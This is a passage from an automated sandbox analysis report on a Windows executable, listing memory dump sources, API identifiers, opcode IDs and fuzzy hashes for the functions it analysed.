                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$CreateErrorLastMove$_invalid_parameter_noinfo_noreturn
                                                                                  • String ID:
                                                                                  • API String ID: 34527147-0
                                                                                  • Opcode ID: 3d42be01f5da7359752b23aff0a4933365d5119f3f7d56a086558a804adc0db8
                                                                                  • Instruction ID: f44ed5ad24e59362ab1bf91df1627b131ff7d8dfe4eadec1e5e97d1ff558aa03
                                                                                  • Opcode Fuzzy Hash: 3d42be01f5da7359752b23aff0a4933365d5119f3f7d56a086558a804adc0db8
                                                                                  • Instruction Fuzzy Hash: 6E91C422B1874A81FA50EBA2D444ABDA3A1FF54BC4F884076EE0D47B95DF3CD946C350
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Version
                                                                                  • String ID:
                                                                                  • API String ID: 1889659487-0
                                                                                  • Opcode ID: 5e1f820920c456f15e44ae9d5f0cc3b6f822566f542002a6e47536c5256bfc9c
                                                                                  • Instruction ID: 3b0c689dfb3be5197205a8049561936f89c0765fd43e8b12476526422b8d88cf
                                                                                  • Opcode Fuzzy Hash: 5e1f820920c456f15e44ae9d5f0cc3b6f822566f542002a6e47536c5256bfc9c
                                                                                  • Instruction Fuzzy Hash: 1B01847194D78686FA71ABB4A414BB5F7906FA9B05FCC01B4C69C07291DE3CA84A8A34
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                  • String ID: 0
                                                                                  • API String ID: 3215553584-4108050209
                                                                                  • Opcode ID: 0fbd957179d89af9e1d3453d65279f22830f04fe064c784c04e338e6c7bf3646
                                                                                  • Instruction ID: 544ae1a26cd29005c19ca7342bf34710aaca25e2441431dd2acdaabdeb745e98
                                                                                  • Opcode Fuzzy Hash: 0fbd957179d89af9e1d3453d65279f22830f04fe064c784c04e338e6c7bf3646
                                                                                  • Instruction Fuzzy Hash: 8E81FA22A1814246FAE8AA958040E7DABD0EF58B48FDC15B2DDC9876D5CF3DE847C760
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                  • String ID: 0
                                                                                  • API String ID: 3215553584-4108050209
                                                                                  • Opcode ID: a261a21fa45f21d734edfefcd2ffe271b1157111beaf653bc061adca1a26389c
                                                                                  • Instruction ID: 76197980ec048654ef970d8a8edb55aec7de4b01c3c200bf9b466060a6f2f81e
                                                                                  • Opcode Fuzzy Hash: a261a21fa45f21d734edfefcd2ffe271b1157111beaf653bc061adca1a26389c
                                                                                  • Instruction Fuzzy Hash: 47715A21A0C24346FBE8AA994040E7DEB90AF49704FDD15B1CDC98F6E6CE2DF8478760
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: gj
                                                                                  • API String ID: 0-4203073231
                                                                                  • Opcode ID: 226aa63bfce789330e15763d8953fb7d553c3450d9c1aa6f260de1088bdface5
                                                                                  • Instruction ID: eb422b139c95b3d26e12d23ee889dde23ef1a5e1c160688f643d0237f9659d3e
                                                                                  • Opcode Fuzzy Hash: 226aa63bfce789330e15763d8953fb7d553c3450d9c1aa6f260de1088bdface5
                                                                                  • Instruction Fuzzy Hash: F05192377286908BD754CF65E400A9EB3A5F788758F445126EF8A93B09CB3DE945CF40
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @
                                                                                  • API String ID: 0-2766056989
                                                                                  • Opcode ID: 49e7fa989fc271adaa8e130b28d1cae0d9f82f392019a5f874cdac11a507a941
                                                                                  • Instruction ID: 3d5d38710f7976612977142d632d00be3402595d0039296971e4adccc4dbf73d
                                                                                  • Opcode Fuzzy Hash: 49e7fa989fc271adaa8e130b28d1cae0d9f82f392019a5f874cdac11a507a941
                                                                                  • Instruction Fuzzy Hash: C241EF32714A458AFE48DF6AD8146A9B7A1AB58FC0B8D9036DE5D87754EE3DD042C300
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: HeapProcess
                                                                                  • String ID:
                                                                                  • API String ID: 54951025-0
                                                                                  • Opcode ID: 4ce929ddb23f73c0a8458b43b9ad49d4d7e2a2f746430c3d48bba7e89996d797
                                                                                  • Instruction ID: 44a54d98e638e89c69c89272c707bb7b32b7e8c70b26edfcc767d8f358ccc436
                                                                                  • Opcode Fuzzy Hash: 4ce929ddb23f73c0a8458b43b9ad49d4d7e2a2f746430c3d48bba7e89996d797
                                                                                  • Instruction Fuzzy Hash: B2B09220E17A02C2FA083B516C8265467A4BF98700FD890B8C10C41320DE2C20A64721
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 1df1e6e81a57214c8643d36be1bb9cde3812740f73d4ab830297bee2ffae98a2
                                                                                  • Instruction ID: e5063187b46da1f4332b0ea67cd880881b2cd13d31bed0f0409a423168aeae03
                                                                                  • Opcode Fuzzy Hash: 1df1e6e81a57214c8643d36be1bb9cde3812740f73d4ab830297bee2ffae98a2
                                                                                  • Instruction Fuzzy Hash: 3A821672A096C186F705DFA4D428ABCBBA1EB51F84F5D817AEB4E07385DA3DD446C320
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: fb6bb4a62616f0bcd3e2e2126cd32946fe2ad160a7c0dbd4e5bd03ed1428d6a6
                                                                                  • Instruction ID: 83e291f4b0c6ed4ce269b4ee305059bda775ecc670df3ca7fb25151afeb4541a
                                                                                  • Opcode Fuzzy Hash: fb6bb4a62616f0bcd3e2e2126cd32946fe2ad160a7c0dbd4e5bd03ed1428d6a6
                                                                                  • Instruction Fuzzy Hash: 47626D9AD3AF9A1EE303A53954131D2E35C0EF74C9551E31BFCE431E66EB92A6832314
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 83a45c88a368d7276059de07aefbbc35b61cea5d64746511b72f3674958eea04
                                                                                  • Instruction ID: 876dd17e6b650fb909a4465a553c208f24b3cf6839ac0201cc88bd0a82143207
                                                                                  • Opcode Fuzzy Hash: 83a45c88a368d7276059de07aefbbc35b61cea5d64746511b72f3674958eea04
                                                                                  • Instruction Fuzzy Hash: DF8212B2A086C28AF714DE64D428AFCBBA1FB55B48F4C8176EA4D47785DA3CD446C720
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: ffdf8f5a64276e3eb417e3b9ae5b43350349d41efb04db03fca9f8ba9e24336f
                                                                                  • Instruction ID: 2e7f0033d21fa7aa566d2f06265f654d1149fda1dba481cc2e1f9c242b2a91da
                                                                                  • Opcode Fuzzy Hash: ffdf8f5a64276e3eb417e3b9ae5b43350349d41efb04db03fca9f8ba9e24336f
                                                                                  • Instruction Fuzzy Hash: DE220573B206508BD728CF25D89AE5E3766F798344B4B8228DF4ACB789DB38D505CB40
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 21143e83615dcc23e36b64f0d60848ac948cba63854c17a605a1a3ec217f9251
                                                                                  • Instruction ID: 15623ade0bfa76dc237126b33c12912fd7e1758177e1472abc2e71e4d677694b
                                                                                  • Opcode Fuzzy Hash: 21143e83615dcc23e36b64f0d60848ac948cba63854c17a605a1a3ec217f9251
                                                                                  • Instruction Fuzzy Hash: 2D32E372A041928BF718DF64D564BBC77A1FB54B08F498139EB4A87B84DB3CE852C750
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 063370d9e2e9571dc593e8358d008e0ec5385ad0435e9f2f5019d46da215c13b
                                                                                  • Instruction ID: 535645d965f7166125f7125b132f617222d99bdbee73de0ac4f008023e3b5372
                                                                                  • Opcode Fuzzy Hash: 063370d9e2e9571dc593e8358d008e0ec5385ad0435e9f2f5019d46da215c13b
                                                                                  • Instruction Fuzzy Hash: F4C1ADB7B281908FE350CFBAE400A9D7BB1F39878CB559125DF59A3B09D639E605CB40
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 602477e063b5c1ca901f2159ae3c7fc010244aaa433e93e1960e83d539d05e76
                                                                                  • Instruction ID: ab76708425b923dd5c8f4b6af807d31c06a5387a1d97cd293a53037d81579cb5
                                                                                  • Opcode Fuzzy Hash: 602477e063b5c1ca901f2159ae3c7fc010244aaa433e93e1960e83d539d05e76
                                                                                  • Instruction Fuzzy Hash: 79A15773A0828646FB15FAA4C424BFDE691EF90744F8D4175EA4A07786EE3CE847C760
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: e3f156a61251d3696a660eff3e2c5499dd818c979554cbf7ea7c30eccab92618
                                                                                  • Instruction ID: 7fcacde8c302b92af7088567be66205bef30c37f073d24343f1aa51a169f225d
                                                                                  • Opcode Fuzzy Hash: e3f156a61251d3696a660eff3e2c5499dd818c979554cbf7ea7c30eccab92618
                                                                                  • Instruction Fuzzy Hash: 0EC10573A292E44DF302CBB5A4248FD3FB1E71E34DB4A4151EFA666B4AD6285201DB70
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc
                                                                                  • String ID:
                                                                                  • API String ID: 190572456-0
                                                                                  • Opcode ID: ba0d91b71a6ba36ace61fab0c0f7d4922daa1e3f8d028e3e8b3457ff5b2a4fa0
                                                                                  • Instruction ID: c1db9896ad0c61840defaf30bdb33fa964b69cfd3165f0a26b5bf8f82a4323bc
                                                                                  • Opcode Fuzzy Hash: ba0d91b71a6ba36ace61fab0c0f7d4922daa1e3f8d028e3e8b3457ff5b2a4fa0
                                                                                  • Instruction Fuzzy Hash: 4E912362B1868196FB11EF69E450AFDA7A0FF95788F880031EF4E07649EF39D646C350
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: cfd80b8924012b3a81ce264cde7180753b201b1e387c519ebd9873ce58afa85e
                                                                                  • Instruction ID: e8424e2d8426bdb9088810edeabbf7eae0ef8f573df514e2c2a7da153a32c3e7
                                                                                  • Opcode Fuzzy Hash: cfd80b8924012b3a81ce264cde7180753b201b1e387c519ebd9873ce58afa85e
                                                                                  • Instruction Fuzzy Hash: E4612823B192D549FB01DFB585108FDBFB1EB19784B898072CE9A57646DA3CE907CB20
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 8137a9b05b05aada6fbcd6bbdda66db02b1ef4637fe403d2df7c72722ebbdea5
                                                                                  • Instruction ID: e4fda2a66bac8def610227ac78a15b7668dfbc1a860c2e974707877fc5cea1c9
                                                                                  • Opcode Fuzzy Hash: 8137a9b05b05aada6fbcd6bbdda66db02b1ef4637fe403d2df7c72722ebbdea5
                                                                                  • Instruction Fuzzy Hash: FE510273B181514BF729AF68D024BADB751FB90B48F884134EB4947789EE3DE54ACB10
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
